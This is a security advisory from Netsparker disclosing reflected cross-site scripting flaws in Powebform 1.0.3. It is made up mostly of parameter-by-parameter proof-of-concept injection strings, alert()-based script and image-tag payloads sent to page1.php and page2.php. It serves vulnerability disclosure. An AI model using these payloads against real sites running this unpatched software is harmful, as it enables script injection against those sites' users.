Information
--------------------
Advisory by Netsparker
Name: Multiple Reflected XSS Vulnerabilities in Powebform 1.0.3
Affected Software : Powebform 1.0.3
Affected Versions: 1.0.3
Vendor Homepage : https://sourceforge.net/projects/powebform/files/powebform/1.0.3/ 
Vulnerability Type : Cross-site Scripting
Severity : Important
Status : Not Fixed
Netsparker Advisory Reference : NS-17-007

Technical Details
--------------------

Proof of Concept URL for XSSes vulnerabilities in Powebform;

Url /powebform-1.0.3/page1.php
Parameter Name supp_fax
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000C4A)</scRipt>

Url /powebform-1.0.3/page1.php
Parameter Name anum_item
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000C5E)</scRipt>

Url /powebform-1.0.3/page1.php
Parameter Name supp_tele
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000C42)</scRipt>

Url /powebform-1.0.3/page1.php
Parameter Name supp_post
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000C3E)</scRipt>

Url /powebform-1.0.3/page1.php
Parameter Name supp_add4
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000C3A)</scRipt>

Url /powebform-1.0.3/page1.php
Parameter Name supp_add1
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000C0A)</scRipt>

Url /powebform-1.0.3/page1.php
Parameter Name supp_add3
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000C36)</scRipt>

Url /powebform-1.0.3/page1.php
Parameter Name supp_add2
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000C32)</scRipt>

Url /powebform-1.0.3/page1.php
Parameter Name budget
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000BFA)</scRipt>

Url /powebform-1.0.3/page1.php
Parameter Name dept
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x0009C2)</scRipt>

Url /powebform-1.0.3/page1.php
Parameter Name supp_name
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000C02)</scRipt>

Url /powebform-1.0.3/page1.php
Parameter Name name
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000762)</scRipt>

Url /powebform-1.0.3/page1.php/'"--></style></scRipt><scRipt>alert(0x0000E0)</scRipt>
Parameter Name URI-BASED
Parameter Type Full URL
Attack Pattern /'"--></style></scRipt><scRipt>alert(0x0000E0)</scRipt>

Url /powebform-1.0.3/page1.php/'"--></style></scRipt><scRipt>alert(0x0004AC)</scRipt>
Parameter Name URI-BASED
Parameter Type Full URL
Attack Pattern /'"--></style></scRipt><scRipt>alert(0x0004AC)</scRipt>

Url /powebform-1.0.3/page2.php
Parameter Name quant_1
Parameter Type POST
Attack Pattern "><scRipt>alert(9)</scRipt>

Url /powebform-1.0.3/page2.php
Parameter Name quant_3
Parameter Type POST
Attack Pattern "><scRipt>alert(9)</scRipt>

Url /powebform-1.0.3/page2.php
Parameter Name quant_2
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000276)</scRipt>

Url /powebform-1.0.3/page2.php
Parameter Name code_3
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x00027A)</scRipt>

Url /powebform-1.0.3/page2.php
Parameter Name code_2
Parameter Type POST
Attack Pattern "><iMg src=N onerror=alert(9)>

Url /powebform-1.0.3/page2.php
Parameter Name code_1
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000C34)</scRipt>

Url /powebform-1.0.3/page2.php
Parameter Name cost_1
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000C40)</scRipt>

Url /powebform-1.0.3/page2.php
Parameter Name cost_3
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000291)</scRipt>

Url /powebform-1.0.3/page2.php
Parameter Name cost_2
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000278)</scRipt>

Url /powebform-1.0.3/page2.php
Parameter Name shipping
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000292)</scRipt>

Url /powebform-1.0.3/page2.php
Parameter Name descrip_1
Parameter Type POST
Attack Pattern "><scRipt>alert(9)</scRipt>

Url /powebform-1.0.3/page2.php
Parameter Name descrip_2
Parameter Type POST
Attack Pattern '"--></style></scRipt><scRipt>alert(0x000274)</scRipt>

Url /powebform-1.0.3/page2.php
Parameter Name descrip_3
Parameter Type POST
Attack Pattern "><scRipt>alert(9)</scRipt>

Url /powebform-1.0.3/page2.php/'"--></style></scRipt><scRipt>alert(0x0002F8)</scRipt>
Parameter Name URI-BASED
Parameter Type Full URL
Attack Pattern /'"--></style></scRipt><scRipt>alert(0x0002F8)</scRipt>

Url /powebform-1.0.3/page2.php/'"--></style></scRipt><scRipt>alert(0x0005BE)</scRipt>
Parameter Name URI-BASED
Parameter Type Full URL
Attack Pattern /'"--></style></scRipt><scRipt>alert(0x0005BE)</scRipt>

For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).

Advisory Timeline
--------------------
08 Feb 2017 - Advisory released

Solution
--------------------
No solution available at the time of publishing of this advisory.

Credits & Authors
--------------------
This issues has been discovered by Enes Aslanbakan while testing Netsparker Web Application Security Scanner.

About Netsparker
--------------------
Netsparker web application security scanners find and report security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engine's unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities. The Netsparker web application security scanner is available in two editions; Netsparker Desktop and Netsparker Cloud. Visit our website https://www.netsparker.com for more information.